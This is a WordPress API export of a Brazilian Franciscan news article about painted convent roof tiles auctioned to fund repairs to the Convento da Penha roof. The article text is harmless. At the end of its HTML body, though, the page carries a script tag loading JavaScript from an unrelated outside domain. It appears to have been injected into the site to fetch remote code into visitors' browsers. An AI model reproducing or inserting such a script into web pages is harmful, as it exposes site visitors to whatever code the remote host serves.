{"id":155608,"date":"2018-04-04T10:52:04","date_gmt":"2018-04-04T13:52:04","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=155608"},"modified":"2019-04-08T21:37:02","modified_gmt":"2019-04-09T00:37:02","slug":"telhas-do-convento-viram-arte-e-vao-a-leilao","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html","title":{"rendered":"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/04\/telhado_040418.jpg\" alt=\"telhado_040418\" width=\"830\" height=\"348\" \/><\/p>\n<p><strong>Frei Augusto Luiz Gabriel e Moacir Beggo<\/strong><\/p>\n<p><strong><img loading=\"lazy\" class=\"alignright size-full wp-image-155622\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/04\/terra_santa.jpg\" alt=\"terra_santa\" width=\"239\" height=\"500\" \/>\u00a0Vila Velha (ES)<\/strong> &#8211; Com parte do projeto &#8220;Telhados da f\u00e9&#8221;, que visa a troca de toda a cobertura atual do Convento da Penha, uma por\u00e7\u00e3o das telhas foram vendidas e outra parte das 7 mil telhas foram doadas a uma fam\u00edlia carente de Vila Velha, mas 33 telhas tiveram um destino mais do que especial: tornaram-se obras de arte nas m\u00e3os de artistas pl\u00e1sticos volunt\u00e1rios. Gentilmente, eles oferecem o dom de sua arte para produzir sobre as telhas, pinturas e desenhos que retratam o Convento da Penha e este cen\u00e1rio da f\u00e9.<\/p>\n<p>Esse projeto, que se chama &#8220;Telha Santa&#8221;,\u00a0 poder\u00e1 ser visto at\u00e9 o dia 21 de abril em Exposi\u00e7\u00e3o no Dispens\u00e1rio S\u00e3o Judas Tadeu,\u00a0 ao lado da Igreja Nossa Senhora do Ros\u00e1rio, na Prainha, a mais antiga do Brasil em funcionamento.\u00a0 Mas desde j\u00e1 essas obras\u00a0 podem receber lances no Leil\u00e3o eletr\u00f4nico, que terminar\u00e1 no dia 21 de abril, pelo endere\u00e7o: <a href=\"http:\/\/www.suedpeterleiloes.com.br\/externo\/leilao\/222\/leilao-beneficente-convento-da-penha\">www.suedpeterleiloes.com.br<\/a>.<\/p>\n<p>Segundo a coordenadora do projeto,\u00a0Marcelina M. C. de Freitas Siqueira, quem n\u00e3o conseguir ver as obras em exposi\u00e7\u00e3o ou adquirir uma delas no leil\u00e3o, futuramente poder\u00e1 comprar o livro que vai registrar todas as pe\u00e7as, assim como trar\u00e1 um hist\u00f3rico\u00a0 do telhado do Convento.\u00a0 &#8220;Quando acabar o leil\u00e3o, tudo ficar\u00e1 registrado num livro&#8221;, explica Marcelina, que \u00e9 m\u00e9dica e\u00a0acompanha a comunidade franciscana h\u00e1 40 anos. &#8220;Desde crian\u00e7a tenho essa proximidade com os frades franciscanos do Santu\u00e1rio Divino Esp\u00edrito Santo e do Convento da Penha&#8221;, explica.<\/p>\n<p>\u00c9 dela a ideia de fazer este projeto.\u00a0 &#8220;Eu vi as telhas sendo vendidas a 10 reais e achei que se poderia agregar um pouco mais no valor para ajudar nesta campanha do telhado.\u00a0 Fiz contato com uma artista, Kathy Marcondes, e ela, por sua vez, fez contato com o Atelier da Zeth Aguiar e a ideia ganhou forma com o convite a essas artistas&#8221;, contou Marcelina, que reuniu 13 artistas, todas volunt\u00e1rias, neste projeto.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/04\/telhado_040418_9.jpg\" alt=\"telhado_040418_9\" width=\"830\" height=\"389\" \/><\/p>\n<p>&#8220;O Convento da Penha \u00e9 encantador. Encanta a muitos.\u00a0 E foi a for\u00e7a desse grande s\u00edmbolo que \u00e9 o Convento que moveu a inspira\u00e7\u00e3o de todos no grupo de colaboradores. Cada um no seu papel de &#8216;formiguinha&#8217;, fez a sua parte, para realizarmos o \u201csonho\u201d da publica\u00e7\u00e3o do &#8216;Telha Santa'&#8221;, diz Kathy Amorim Marcondes na introdu\u00e7\u00e3o deste livro. &#8220;Tentamos preservar aqui a mem\u00f3ria de todo amor, devo\u00e7\u00e3o e qualidade art\u00edstica e simb\u00f3lica do material produzido! Nosso livro\/mem\u00f3ria\/cat\u00e1logo pretende ser a \u00faltima forma de levar essas telhas, novamente, a prosseguirem o seu caminho e espalhar o &#8216;Telhado da F\u00e9&#8217; e o simbolismo do Convento da Penha para outras casas, para outras par\u00f3quias, para outros cora\u00e7\u00f5es&#8221;, espera Kathy.<\/p>\n<p>Uma dessas artistas \u00e9\u00a0Aidini Graciosa Schaquetti, uma apaixonada pelo Convento da Penha. S\u00f3 para se ter ideia dessa paix\u00e3o, dez obras em telhas retratam o Convento e fazem parte desta exposi\u00e7\u00e3o. &#8220;Assim que me aposentei, comecei a pintar aos poucos. Fui gostando cada vez mais do of\u00edcio at\u00e9 que participei de um projeto para pintar capelas. Escolhi o Convento da Penha e todo mundo gostou muito. Desde ent\u00e3o passei a pintar o Convento de todos os \u00e2ngulos&#8221;, conta Aidini, professora do ensino fundamental.<\/p>\n<p><img loading=\"lazy\" class=\"alignleft wp-image-155612\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/04\/telhado_040418_1.jpg\" alt=\"telhado_040418_1\" width=\"200\" height=\"197\" \/><img loading=\"lazy\" class=\"alignleft wp-image-155610\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/04\/telhado_040418_2.jpg\" alt=\"telhado_040418_2\" width=\"215\" height=\"197\" \/><\/p>\n<p>&#8220;O Convento al\u00e9m de ser um ponto tur\u00edstico, \u00e9 um santu\u00e1rio onde vou para rezar e agradecer. \u00c9 um lugar que me d\u00e1 paz. Essa mesma paz eu encontro tamb\u00e9m quando estou pintando o Convento&#8221;, diz Aidini, o que explica a facilidade com que fez as 10 telhas.<\/p>\n<p>J\u00e1 a mineira Maria Madalena Schettini \u00a0\u00e9 professora de arte, para quem a pintura teve o significado de ora\u00e7\u00e3o:\u00a0 &#8220;\u00c9 um jogar da alma sobre uma telha e elevar at\u00e9 o c\u00e9u&#8221;, garante. Para ela, esse processo acontece desde a busca de materiais at\u00e9 o destino dessas telhas. &#8220;Porque, com certeza, a pessoa que adquirir esta obra vai cuidar deste pedacinho da<br \/>\nPenha&#8221;, espera.\u00a0 (<em>Madalena (\u00e0 esq. na foto) e Aidini, \u00e0 direita).<\/em><\/p>\n<p>Para o guardi\u00e3o do Convento, Frei Paulo Roberto Pereira, a troca do telhado \u00e9 urgente e ajudar\u00e1 na preserva\u00e7\u00e3o do patrim\u00f4nio. \u201c\u00c9 uma honra para n\u00f3s, franciscanos, cuidarmos do Convento, mas sabemos que \u00e9 um lugar que recebe a todos e que precisa ser cuidado\u201d, destaca, lembrando que como estava, com muitas infiltra\u00e7\u00f5es, a estrutura corria o risco de degenerar completamente. Essa reforma dar\u00e1 uma sobrevida de mais 60 anos, o tempo em que se calcula que foi feito o \u00faltimo telhado.<\/p>\n<p><strong>Fazem parte deste projeto:\u00a0<\/strong>Aidini Graciosa Schaquetti Demoner, Ana Helea Bai\u00e3o, Angela Gon\u00e7alves Faria, Cyrus Augusto Marcondes Ferrari, Eliane Maria Moreira de Almeida, Eloiza Guedes Pellanda, Elizete Ferreira Aguiar, Kathy Amorim Marcondes, Lucia Martins Soares Fernandes Bomfim, Maria Madalena Schettini da Silva, Marildes Gomes da Silva, Marinez Duarte, Penha Medeiros, Waleska Assad Martins Soares e Zuleica Passos Gomes.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/04\/telhado_040418_4.jpg\" alt=\"telhado_040418_4\" width=\"830\" height=\"471\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Festa da Penha<\/p>\n","protected":false},"author":1,"featured_media":202336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[245],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Festa da Penha\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-04T13:52:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-04-09T00:37:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/04\/telhado_040418.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/04\/telhado_040418.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/04\/telhado_040418.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html\",\"name\":\"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#primaryimage\"},\"datePublished\":\"2018-04-04T13:52:04+00:00\",\"dateModified\":\"2019-04-09T00:37:02+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html","og_locale":"pt_BR","og_type":"article","og_title":"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o - Not\u00edcias - Franciscanos","og_description":"Festa da Penha","og_url":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-04-04T13:52:04+00:00","article_modified_time":"2019-04-09T00:37:02+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/04\/telhado_040418.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/04\/telhado_040418.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/04\/telhado_040418.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html","name":"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#primaryimage"},"datePublished":"2018-04-04T13:52:04+00:00","dateModified":"2019-04-09T00:37:02+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/telhas-do-convento-viram-arte-e-vao-a-leilao.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Telhas do Convento viram arte e ir\u00e3o a leil\u00e3o"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/155608"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=155608"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/155608\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/202336"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=155608"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=155608"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=155608"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}